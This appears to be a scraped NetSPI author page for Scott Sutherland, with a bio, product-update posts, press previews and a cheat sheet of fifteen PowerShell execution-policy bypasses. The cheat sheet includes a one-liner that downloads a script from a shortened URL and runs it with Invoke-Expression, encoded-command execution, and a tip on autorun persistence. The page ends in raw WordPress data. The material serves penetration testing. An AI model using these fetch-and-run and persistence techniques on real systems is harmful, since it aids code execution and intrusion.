Scott Sutherland

Scott is Vice President of Research at NetSPI. In that role, he helps grow the execution team and services while performing research and development of testing tools, techniques, and methodologies used during engagements. Over the past sixteen years, Scott has had the opportunity to provide security services to small and large organizations (Fortune 5) across many industry verticals, but his focus has always been on identifying critical client needs and designing service delivery models to meet them. Scott is also an active participant in the information security community and has contributed multiple open-source tools, technical security blog posts, whitepapers, and presentations.

Below are links to some of his published material:

Presentations
https://www.slideshare.net/nullbind

Recent Open-Source Projects
https://github.com/NetSPI/PowerUpSQL
https://github.com/NetSPI/PowerHuntShares
https://github.com/NetSPI/PowerHunt
More by Scott Sutherland
Breach and Attack Simulation & Security Team Success

Many companies test whether malicious actors can gain access to their environment or steal their valuable information; however, most security professionals don’t know whether they could detect adversaries once they are already inside. In fact, only 20% of common attack behaviors are caught by out-of-the-box EDR, MSSP, and SIEM solutions.

Join Scott Sutherland, NetSPI's Vice President of Research, and SANS Institute's John Pescatore for a discussion on how Breach and Attack Simulation (BAS) is a critical piece of security team success at any organization.

You’ll gain valuable insights into:

  • Key BAS market trends.
  • Critical discoveries from years of testing.
  • Noteworthy feedback from security team leaders.

Finally, you will learn how these findings have impacted the development of NetSPI’s latest Breach and Attack Simulation updates, which launched earlier this year, empowering security professionals to efficiently evaluate their detective controls, educate their SOC teams, and execute on actionable intelligence!

Watch the webinar recording: https://youtu.be/6Oy7FTX2WsQ

NetSPI Offensive Security Solutions Updates: Q1 2023

NetSPI prides itself on maintaining a leadership position in the global offensive security space by listening to client feedback, analyzing industry trends, and investing in breakthrough technology developments.

Over the last few months, our development teams have been busy, and are excited to introduce a variety of new features and capabilities across our Breach and Attack Simulation, Attack Surface Management, and Penetration Testing as a Service (PTaaS) solutions to help organizations improve security posture, streamline remediation, and protect themselves from adversaries.

Of the releases across our solutions portfolio, Breach and Attack Simulation (BAS) received the most significant updates, so let's start there.

Breach and Attack Simulation (BAS) 

NetSPI BAS data shows that only 20% of common attack behaviors are detected by traditional EDR, SIEM, and MSSP solutions. Although most companies spend thousands, even millions, of dollars on detective controls, very few test to validate that those controls work and provide the value they claim.

NetSPI’s Breach and Attack Simulation is designed to evaluate detective control effectiveness and educate security operations teams on common TTPs across the cyber kill chain. After many invaluable feedback sessions with NetSPI clients and hours of market research, we are excited to unveil major updates to our Breach and Attack Simulation platform, dialing in on three core dashboards: the Workspace, the Timeline, and the Heat Map.

Workspace 

The Workspace is where red teams, purple teams, security engineers, and analysts will spend the majority of their time. Here, they can build, configure, and run customized procedures to test their detective controls. Key features within the Workspace include:

  • Utilize preconfigured procedures, or customize your own, to put detective controls to the test. 
  • Visualize security posture and identify gaps using detailed summary charts that update in real time. These can be saved and downloaded to share with SOC teams and executive leadership, highlighting gaps and justifying budget for new staff and technology. 
  • Learn about each detection phase (logged, detected, alerted, responded, and prevented) for common TTPs within the MITRE ATT&CK framework, down to the individual procedure level.  
  • Replace the spreadsheets, wiki pages, and notepads teams currently use to track detective control capabilities with the Activity Log, which centralizes that information from the summary level down to the findings level, streamlines communication and remediation, and automatically logs play execution and visibility state changes. 
  • Use tags to see how many malware families and threat actors employ a specific technique, helping prioritize resources and remediation efforts. Tags can also generate custom playbooks of procedures used by specific threat actors, so security teams can quickly and easily measure their resiliency to specific threats. 
  • Export test results as JSON or CSV so the SOC team can plug the information into existing business processes and products, or develop customized metrics. 

In summary, the Workspace is designed to educate and enable security teams to understand common attack procedures, how to detect them, and provide resources where they can learn more. 

Timeline 

While the Workspace shows a lot of great information, it focuses on a single point in time. The Timeline dashboard, however, allows you to measure detective controls over time.

This allows security teams to prove the value of investments in people, processes, or technology. The Timeline dashboard will also show where things have improved, stayed the same, or gotten worse at any stage of the MITRE ATT&CK kill chain.

While many competing BAS offerings only show what is being alerted on, a unique differentiator for NetSPI is the ability to filter results and show changes in what is logged, detected, alerted, responded, and prevented. These changes can be shown as a percentage (e.g., logging improved 5 percent) or a count (e.g., logging improved within two different procedures). As in the Workspace, these charts can be downloaded and easily inserted into presentations, emails, or other reports as needed.

For additional information on how NetSPI defines logging, detection, alerting, response, and prevention, read How to Paint a Comprehensive Threat Detection Landscape.

Heat Map

Security teams often refer to the MITRE ATT&CK framework, which catalogs the phases, tactics, and techniques of common TTPs seen in the wild. We know that many teams prefer seeing results in this framework, and as such, we have built it into our Breach and Attack Simulation platform. BAS delivers a familiar way to interact with the data, while still connecting to the Workspace created for detection engineers and other security team members.

As mentioned in the Timeline dashboard section, a key differentiator is that we show the different visibility levels (logged, detected, alerted, responded, and prevented) within the MITRE ATT&CK framework, for each phase of the cyber kill chain and even down to each specific technique.

Here, we also have the ability to dig in and show all of the procedures supported within each technique category. These are cross-linked back to the Workspace to streamline remediation and re-testing of specific coverage gaps.

This is a quick summary of a few new features and benefits included in our updated Breach and Attack Simulation solution. If you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

Attack Surface Management (ASM) 

Attack Surface Management continues to be a major focus and a growing technology within the cybersecurity industry. NetSPI’s most recent ASM updates focus on organizing, filtering, and expanding information that was previously included, making it even easier to locate and pull actionable insights from the platform.

Three key new feature highlights from last quarter include Vulnerability Triggers, Certificate Transparency Logs, and the Subdomain Facet within our domain explore page.

Vulnerability Triggers

First off, what is a vulnerability? In this context, vulnerabilities are exploitable conditions of significant risk identified on your attack surface, found by combining assets and exposures. Although a specific asset or exposure might not be very impactful on its own, a series of them chained together can result in a much greater risk.

With the recent introduction of Vulnerability Triggers, admins can now query assets and exposures for specific criteria based on preconfigured or customized searches, and alert on the findings that are most concerning to you or your company. Vulnerability Triggers can be customized to search for criteria related to Domains, IPs, or Ports.

Long story short, Vulnerability Triggers allow your company to search not only for common assets, exploits, and vulnerabilities, but also for key areas of concern specific to your executive team, industry, organization, or project.

Certificate Transparency Logs & Subdomain Facet

The next two new features are focused on root domain and subdomain discovery.

NetSPI’s ASM has searched root domains and subdomains since its creation; however, we are proud to officially introduce Certificate Transparency Logs! We now ingest certificate transparency logs from public data sources, allowing us to significantly increase domain discovery.

We are also excited to announce the release of the Subdomain Facet within our domain explore page. It is common for companies to have tens, or even hundreds, of subdomains on their attack surface; with the Subdomain Facet, you can now filter the common subdomains on your attack surface.

A great example use case is discovering development subdomains (dev.netspi.com, stage.netspi.com, prod.netspi.com, etc.) where sensitive projects or intellectual property might be located and unintentionally exposed externally.

Another common use case for these features is detecting subdomains that have been hijacked by malicious adversaries in an attempt to steal sensitive customer or employee information.

This is a quick summary of a few new features and benefits included in our Attack Surface Management offering. If you would like to learn more, we encourage you to read our release notes or contact us for a demo.

Penetration Testing as a Service (Resolve™) 

NetSPI’s Resolve, our penetration testing as a service (PTaaS) platform, has been an industry leader for years, allowing users to visualize their test results and streamline remediation by up to 40%. This product would not be able to remain a leader without continued updates from our product development teams.

Recently, we have focused on delivering updates that enhance the user experience and make data within the platform more accessible and more easily leveraged within other security team processes and platforms.

AND/OR Logic

Previously, when users created filters in the grid, either AND logic or OR logic could be applied to filtered search results. We are excited to introduce AND/OR logic for filters, allowing users to combine both AND and OR logic to deliver more detailed results to their security teams or business leaders.

Automated Instance State Workflow

Finally, we have extended automated instance state workflows to include bulk edits. Previously, automation was only applicable when updating individual instance states. This change improves efficiency within the Resolve platform for entire vulnerability management teams.

This is a quick summary of a few new features and benefits included in our PTaaS solution. If you would like to learn more, we encourage you to read our release notes or contact us for a demo.

This blog post is a part of our offensive security solutions update series. Stay tuned for additional innovations within Resolve (PTaaS), ASM (Attack Surface Management), and BAS (Breach and Attack Simulation).



SecurityWeek: Cyber Insights 2023: Cyberinsurance

On January 31, NetSPI's Scott Sutherland, VP of Research, and Norman Kromberg, CISO, were featured in the SecurityWeek article called Cyber Insights 2023: Cyberinsurance. Read the preview below or view it online.

+++

SecurityWeek Cyber Insights 2023 | Cyberinsurance – Cyberinsurance emerged into the mainstream in 2020. In 2021, it found its sums were wrong over ransomware and had to increase premiums dramatically. In 2022, Russia invaded Ukraine with the potential for more serious and more costly global nation-state cyberattacks – and Lloyd's of London announced a stronger and clearer war exclusions clause. 

Higher premiums and wider exclusions are the primary methods for insurance to balance its books – and it is already having to use both. The question for 2023 and beyond is whether the cyberinsurance industry can make a profit without destroying its market. But one thing is certain: a mainstream, funds-rich business like insurance will not easily relinquish a market from which it can profit.

It has a third tool, which has not yet been fully unleashed: prerequisites for cover.

The Lloyd’s war exclusion clause and other difficulties

The Lloyd’s exclusion clause dates to the NotPetya incident of 2017. In some cases, insurers refused to pay out on related claims. Josephine Wolff, an associate professor of cybersecurity policy at the Fletcher School at Tufts University, has written a history of cyberinsurance titled Cyberinsurance Policy: Rethinking Risk in an Age of Ransomware, Computer Fraud, Data Breaches, and Cyberattacks.

“Merck and Mondelez sued their insurers for denying claims related to the attack on the grounds that it was excluded from coverage as a hostile or warlike action because it was perpetrated by a national government,” she explains. However, an initial ruling in late 2021, unsealed in January 2022, indicated that if insurers wanted to exclude state-sponsored attacks from their coverage they must write exclusions stating that explicitly, rather than relying on boilerplate war exclusions. Merck was granted summary judgment on its claim for $1.4 billion.

The Russia/Ukraine kinetic war has caused a massively increased expectation of nation state-inspired cyberattacks against Europe, the US, NATO, and other west-leaning nations. Lloyd's rapidly responded with an expanded, but cyberinsurance-centric, war exclusion clause excluding state-sponsored cyberattacks that will kick in from March 2023. 

Insurers’ response

2023 is a watershed moment for cyberinsurance. It will not abandon what promises to be a massive market – but clearly it cannot continue with its makeshift approach of simply increasing both premiums and exclusions to balance the books indefinitely.

Nevertheless, the expansion of ‘prerequisites’ would be a major – and probably inevitable – evolution in the development of cyberinsurance. Cyberinsurance began as a relatively simple gap-filler. The industry recognized that standard business insurance didn’t explicitly cover against cyber risks, and cyberinsurance evolved to fill that gap. In the beginning, there was no intention to impose cybersecurity conditions on the insured, beyond perhaps a few non-specific basics such as having MFA installed.

But now, comments Scott Sutherland, VP of research at NetSPI, “Insurance company security testing standards will evolve.” It’s been done before, and PCI DSS is the classic example. The payment card industry, explains Sutherland, “observed the personal/business risk associated with insufficient security controls and the key stakeholders combined forces to build policies, standards, and testing procedures that could help reduce that risk in a manageable way for their respective industries.”

He continued, “My guess and hope for 2023, is that the major cyber insurance companies start talking about developing a unified standard for qualifying for cyber insurance. Hopefully, that will bring more qualified security testers into that market which can help drive down the price of assessments and reduce the guesswork/risk being taken on by the cyber insurance companies. While there are undoubtedly more cyber insurance companies than card brands, I think it would work in the best interest of the major players to start serious discussions around the issue and potential solutions.”

There is no silver bullet for cybersecurity. Breaches will continue and will continue to rise in cost and severity – and the insurance industry will continue to balance its books through increasing premiums, exclusions, and insurance refusals. The best that can be hoped for from insurers increasing security requirements is that, as Norman Kromberg, CISO at NetSPI suggests, “Cyber Insurance will become a leading driver for investment in security and IT controls.”

You can read the full article at Security Week!

Help Net Security: 4 Key Shifts in the Breach and Attack Simulation (BAS) Market

On January 11, NetSPI VP of Research Scott Sutherland was featured in the Help Net Security article called 4 Key Shifts in the Breach and Attack Simulation (BAS) Market. Read the preview below or view it online.

+++

The increase in the number of attack surfaces along with the rise in cybercriminal sophistication is generating technical debt for security operations centers (SOCs), many of which are understaffed and unable to dedicate time to effectively manage the growing number of security tools in their environment.

Yet, regardless of these challenges, SOC teams are tasked to continuously evolve and adapt to defend against emerging, sophisticated threats.

There are several major players in the BAS market that promise continuous automated security control validation. Many can replicate specific attacker behavior and integrate with your telemetry stack to verify that the behavior was observed, generated an alert, and was blocked.

But as the BAS market continues to evolve, there’s also an opportunity to address shortcomings. In the new year, we expect to see several incremental improvements to BAS solutions, with these four themes leading the charge.

More Streamlined Product Deployment to Reduce Costs

Many fully automated security control validation solutions include hidden costs. First, they require up-front configuration for their on-site deployments, which may also require customizations to ensure everything works properly with the integrations. Additionally, BAS solutions need to be proactively maintained, and for enterprise environments this often requires dedicated staff.

As a result, we’ll see BAS vendors work harder to streamline their product deployments to help reduce the overhead cost for their customers through methods such as providing more SaaS-based offerings.

You can read the full article at Help Net Security!

Enterprise Security Tech: 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain

On December 29, NetSPI's Scott Sutherland and Nick Landers were featured in the Enterprise Security Tech article called 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain. Read the preview below or view it online.

+++

Scott Sutherland, VP of Research, NetSPI

Can DLT Help Stop Software Supply Chain Attacks?

Adoption of distributed ledger technology (DLT) is still in its infancy and we’ll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DLT can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several “supply chain compromises” that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However, neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem.

Nick Landers, VP of Research, NetSPI

By the end of next year every major financial institution will have announced adoption of Blockchain technology.

There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains.

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven’t already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was “secure by default”, think again. Just like cloud platform adoption, the promises of “secure by default” will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech.

You can read the full article at Enterprise Security Tech!

15 Ways to Bypass the PowerShell Execution Policy

By default, PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. This can be a hurdle for penetration testers, sysadmins, and developers, but it doesn't have to be. In this blog I'll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on the system. I'm sure there are many techniques that I've missed (or simply don't know about), but hopefully this cheat sheet will offer a good start for those who need it.

What is the PowerShell Execution Policy?

The PowerShell execution policy is the setting that determines which type of PowerShell scripts (if any) can be run on the system. By default, it is set to "Restricted", which basically means none. However, it's important to understand that the setting was never meant to be a security control. Instead, it was intended to prevent administrators from shooting themselves in the foot. That's why there are so many options for working around it, including a few that Microsoft has provided. For more information on the execution policy settings and other default security controls in PowerShell, I suggest reading Carlos Perez's blog. He provides a nice overview.

Why Would I Want to Bypass the Execution Policy?

Automation seems to be one of the more common responses I hear from people, but below are a few other reasons PowerShell has become so popular with administrators, pentesters, and hackers. PowerShell is:

  • Native to Windows
  • Able to call the Windows API
  • Able to run commands without writing to the disk
  • Able to avoid detection by anti-virus
  • Already flagged as "trusted" by most application whitelisting solutions
  • A medium used to write many open source pentest toolkits

How to View the Execution Policy

Before being able to use all of the wonderful features PowerShell has to offer, attackers may have to bypass the "Restricted" execution policy. You can take a look at the current configuration with the "Get-ExecutionPolicy" PowerShell command. If you're looking at the setting for the first time, it's likely set to "Restricted" as shown below.

PS C:\> Get-ExecutionPolicy
Restricted

It's also worth noting that the execution policy can be set at different levels on the system. To view a list of them, use the command below. For more information, you can check out Microsoft's "Set-ExecutionPolicy" page here.

Get-ExecutionPolicy -List | Format-Table -AutoSize
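On a system with the default configuration, the output will look something like this:

        Scope ExecutionPolicy
        ----- ---------------
MachinePolicy       Undefined
   UserPolicy       Undefined
      Process       Undefined
  CurrentUser       Undefined
 LocalMachine      Restricted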

Lab Setup Notes

In the examples below I will use a script named runme.ps1 that contains the following PowerShell command to write a message to the console:

Write-Host "My voice is my passport, verify me."

When I attempt to execute it on a system configured with the default execution policy, I get an error telling me that the execution of scripts is disabled on the system.

If your current policy is too open and you want to make it more restrictive to test the techniques below, then run the command "Set-ExecutionPolicy Restricted" from an administrator PowerShell console. Ok - enough of my babbling - below are 15 ways to bypass the PowerShell execution policy restrictions.

Bypassing the PowerShell Execution Policy

1. Paste the Script into an Interactive PowerShell Console

Copy and paste your PowerShell script into an interactive console as shown below. However, keep in mind that you will be limited by your current user's privileges. This is the most basic example and can be handy for running quick scripts when you have an interactive console. Also, this technique does not result in a configuration change or require writing to disk.

PS C:\> Write-Host "My voice is my passport, verify me."
My voice is my passport, verify me.

2. Echo the Script and Pipe it to PowerShell Standard In

Simply ECHO your script into PowerShell standard input. This technique does not result in a configuration change or require writing to disk.

Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -

3. Read Script from a File and Pipe to PowerShell Standard In

Use the Windows "type" command or PowerShell "Get-Content" command to read your script from the disk and pipe it into PowerShell standard input. This technique does not result in a configuration change, but does require writing your script to disk. However, you could read it from a network share if you're trying to avoid writing to the disk.

Example 1: Get-Content PowerShell command

Get-Content .\runme.ps1 | PowerShell.exe -noprofile -


Example 2: Type command

TYPE .\runme.ps1 | PowerShell.exe -noprofile -

4. Download Script from URL and Execute with Invoke Expression

This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn't result in any configuration changes. I have seen it used in many creative ways, but most recently saw it being referenced in a nice PowerSploit blog by Matt Graeber.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')"

5. Use the Command Switch

This technique is very similar to executing a script via copy and paste, but it can be done without the interactive console. It's nice for simple script execution, but more complex scripts usually end up with parsing errors. This technique does not result in a configuration change or require writing to disk.

Example 1: Full command

Powershell -command "Write-Host 'My voice is my passport, verify me.'"


Example 2: Short command

Powershell -c "Write-Host 'My voice is my passport, verify me.'"

It may also be worth noting that you can place these types of PowerShell commands into batch files and place them into autorun locations (like the all users startup folder) to help during privilege escalation.
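As a quick sketch of that idea, the PowerShell below drops a batch file into the all users startup folder (the run.bat name is just an example; note that writing to this location typically requires elevated rights, so the current user's startup folder under $env:APPDATA may be a better fit):

# Write a batch file that runs a PowerShell one-liner at logon
$startup = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Set-Content -Path "$startup\run.bat" -Value 'powershell -c "Write-Host ''My voice is my passport, verify me.''"'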

6. Use the EncodeCommand Switch

This is very similar to the "Command" switch, but all scripts are provided as a Unicode/base64 encoded string. Encoding your script in this way helps to avoid all those nasty parsing errors that you run into when using the "Command" switch. This technique does not result in a configuration change or require writing to disk. The sample below was taken from Posh-SecMod. The same toolkit includes a nice little compression method for reducing the size of the encoded commands if they start getting too long.

Example 1: Full command

$command = "Write-Host 'My voice is my passport, verify me.'" 
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command) 
$encodedCommand = [Convert]::ToBase64String($bytes) 
powershell.exe -EncodedCommand $encodedCommand

Example 2: Short command using encoded string

powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA
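If you ever need to verify what an encoded string will run before executing it, the encoding is easy to reverse. A quick sketch using the string from Example 2:

$encoded = "VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA"
# Decode the base64 string back to the original Unicode (UTF-16LE) command
[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded))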

7. Use the Invoke-Command Command

This is a fun option that I came across on the Obscuresec blog. It’s typically executed through an interactive PowerShell console or a one-liner using the “Command” switch, but the cool thing is that it can be used to execute commands against remote systems where PowerShell remoting has been enabled. This technique does not result in a configuration change or require writing to disk.

invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}

Based on the Obscuresec blog, the command below can also be used to grab the execution policy from a remote computer and apply it to the local computer.

invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force

8. Use the Invoke-Expression Command

This is another one that's typically executed through an interactive PowerShell console or a one-liner using the "Command" switch. This technique does not result in a configuration change or require writing to disk. Below are a few common ways to use Invoke-Expression to bypass the execution policy.

Example 1: Full command using Get-Content

Get-Content .\runme.ps1 | Invoke-Expression

Example 2: Short command using Get-Content

GC .\runme.ps1 | iex

9. Use the "Bypass" Execution Policy Flag

This is a nice flag added by Microsoft that will bypass the execution policy when you're executing scripts from a file. When this flag is used Microsoft states that "Nothing is blocked and there are no warnings or prompts". This technique does not result in a configuration change or require writing to disk.

PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1

10. Use the "Unrestricted" Execution Policy Flag

This is similar to the "Bypass" flag. However, when this flag is used, Microsoft states that it "Loads all configuration files and runs all scripts. If you run an unsigned script that was downloaded from the Internet, you are prompted for permission before it runs." This technique does not result in a configuration change or require writing to disk.

PowerShell.exe -ExecutionPolicy Unrestricted -File .\runme.ps1

11. Use the "Remote-Signed" Execution Policy Flag

Create your script then follow the tutorial written by Carlos Perez to sign it. Finally,run it using the command below:

PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1

12. Disable ExecutionPolicy by Swapping out the AuthorizationManager

This is one of the more creative approaches. The function below can be executed via an interactive PowerShell console or by using the "command" switch. Once the function is called, it will swap out the "AuthorizationManager" with null. As a result, the execution policy is essentially set to unrestricted for the remainder of the session. This technique does not result in a persistent configuration change or require writing to disk; the change only applies for the duration of the session.

function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} 

Disable-ExecutionPolicy
.\runme.ps1

13. Set the ExecutionPolicy for the Process Scope

As we saw in the introduction, the execution policy can be applied at many levels, including the process you have control over. Using this technique, the execution policy can be set to unrestricted for the duration of your session. It does not result in a persistent configuration change or require writing to the disk.

Set-ExecutionPolicy Bypass -Scope Process

14. Set the ExecutionPolicy for the CurrentUser Scope via Command

This option is similar to the process scope, but applies the setting to the current user's environment persistently by modifying a registry key. It does not require writing a script to disk, but unlike the process scope, it does result in a persistent configuration change.

Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted

15. Set the ExecutionPolicy for the CurrentUser Scope via the Registry

In this example I've shown how to change the execution policy for the current user's environment persistently by modifying a registry key directly.

HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
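A minimal PowerShell sketch of that registry change (the ExecutionPolicy value under this key is the one the Set-ExecutionPolicy cmdlet manages for the CurrentUser scope):

# Persistently set the current user's execution policy via the registry
Set-ItemProperty -Path "HKCU:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" -Name ExecutionPolicy -Value Unrestricted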

Wrap Up Summary

I think the theme here is that the execution policy doesn’t have to be a hurdle for developers, admins, or penetration testers. Microsoft never intended it to be a security control, which is why there are so many options for bypassing it. Microsoft was nice enough to provide some native options, and the security community has come up with some really fun tricks. Thanks to all of those people who have contributed through blogs and presentations. To the rest, good luck in all your PowerShell adventures and don't forget to hack responsibly. ;)

Looking for a strategic partner to critically test your Windows systems? Explore NetSPI’s network penetration testing services.


VMblog: 18 Security Leaders Come Together to Share Their 2023 Predictions

On November 29, NetSPI VPs of Research Scott Sutherland and Nick Landers were featured in the VMblog article called 18 Security Leaders Come Together to Share Their 2023 Predictions. Read the preview below or view it online.

+++

What will the New Year bring in cyberspace? Here's a roundup of some of the top security industry forecasts, trends and cybersecurity predictions for 2023. Where do things go from here?

Read on as 18 industry leaders in the security space come together to provide their insights into how the cybersecurity industry will shake out in 2023.

NetSPI: Scott Sutherland, VP of Research - Can DLT Help Stop Software Supply Chain Attacks? 

"Adoption of distributed ledger technology (DTL) is still in its infancy and we'll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DTL can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several "supply chain compromises'' that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem."

+++

NetSPI: Nick Landers, VP of Research - By the end of next year every major financial institution will have announced adoption of Blockchain technology

"There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains. 

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven't already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was "secure by default", think again. Just like cloud platform adoption, the promises of "secure by default" will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech."

You can read the full article at VMblog!

Dark Reading: New Open Source Tools Launched for Adversary Simulation

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Dark Reading article called New Open Source Tools Launched for Adversary Simulation. Read the preview below or view it online.

+++

Network shares in Active Directory environments configured with excessive permissions pose serious risks to the enterprise in the form of data exposure, privilege escalation, and ransomware attacks. Two new open source adversary simulation tools, PowerHuntShares and PowerHunt, help enterprise defenders discover vulnerable network shares and manage the attack surface.

The tools will help defense, identity and access management (IAM), and security operations center (SOC) teams streamline share hunting and remediation of excessive SMB share permissions in Active Directory environments, NetSPI's senior director Scott Sutherland wrote on the company blog. Sutherland developed these tools.

PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain joined computers. The PowerHuntShares tool addresses the risks of excessive share permissions in Active Directory environments that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments.

"PowerHuntShares will inventory SMB share ACLs configured with 'excessive privileges' and highlight 'high risk' ACLs [access control lists]," Sutherland wrote.

PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. The tool automates the collection of artifacts at scale using PowerShell remoting and performs initial analysis. 

You can read the full article at Dark Reading!

Open Source For You: New Open Source Tools From NetSPI Address Information Security Issues

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Open Source For You article called New Open Source Tools From NetSPI Address Information Security Issues. Read the preview below or view it online.

+++

Two new open source solutions for identity and access management (IAM) and security operations centre (SOC) groups have been made available by NetSPI, a business that specialises in enterprise penetration testing and attack surface management. Information security teams will benefit from these tools, PowerHuntShares and PowerHunt, which will help them find weak network shares and enhance detections in general.

PowerHuntShares intends to lessen the problems created by excessive powers in corporate systems, such as data disclosure, privilege escalation, and ransomware assaults. On Active Directory domain-joined PCs, the programme detects, examines, and reports excessive share permissions linked to their respective SMB shares.

A modular threat hunting platform called PowerHunt finds dangers in a variety of target contexts as well as target-specific oddities and outliers. This detection is based on artefacts from popular MITRE ATT&CK techniques. The collection of these artefacts is automated using PowerShell remoting, and initial analysis is then performed. Along with other tools and procedures, PowerHunt also creates simple-to-use .csv files for improved triage and analysis.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott Sutherland, senior director at NetSPI. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

Help Net Security: NetSPI unveils two open-source tools to assist defence teams in uncovering vulnerable network shares

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Help Net Security article called NetSPI unveils two open-source tools to assist defence teams in uncovering vulnerable network shares. Read the preview below or view it online.

+++

At Black Hat USA 2022, NetSPI unveiled two new open-source tools for the information security community: PowerHuntShares and PowerHunt.

These new adversary simulation tools were developed by NetSPI’s Senior Director, Scott Sutherland, to help defense, identity and access management (IAM), and security operations center (SOC) teams discover vulnerable network shares and improve detections.

  • PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain joined computers. This capability helps address the risks of excessive share permissions in Active Directory environments that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments.
  • PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. PowerHunt automates the collection of artifacts at scale using PowerShell remoting and performs initial analysis. It can also output easy-to-consume .csv files so that additional triage and analysis can be done using other tools and processes.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

[post_title] => Help Net Security: NetSPI unveils two open-source tools to assist defence teams in uncovering vulnerable network shares [post_excerpt] => On August 10, NetSPI Senior Director Scott Sutherland was featured in the Help Net Security article called NetSPI unveils two open-source tools to assist defence teams in uncovering vulnerable network shares. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => help-net-security-open-source-tools [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:22 [post_modified_gmt] => 2023-01-23 21:10:22 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28195 [menu_order] => 102 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 28196 [post_author] => 17 [post_date] => 2022-08-09 13:06:00 [post_date_gmt] => 2022-08-09 18:06:00 [post_content] =>

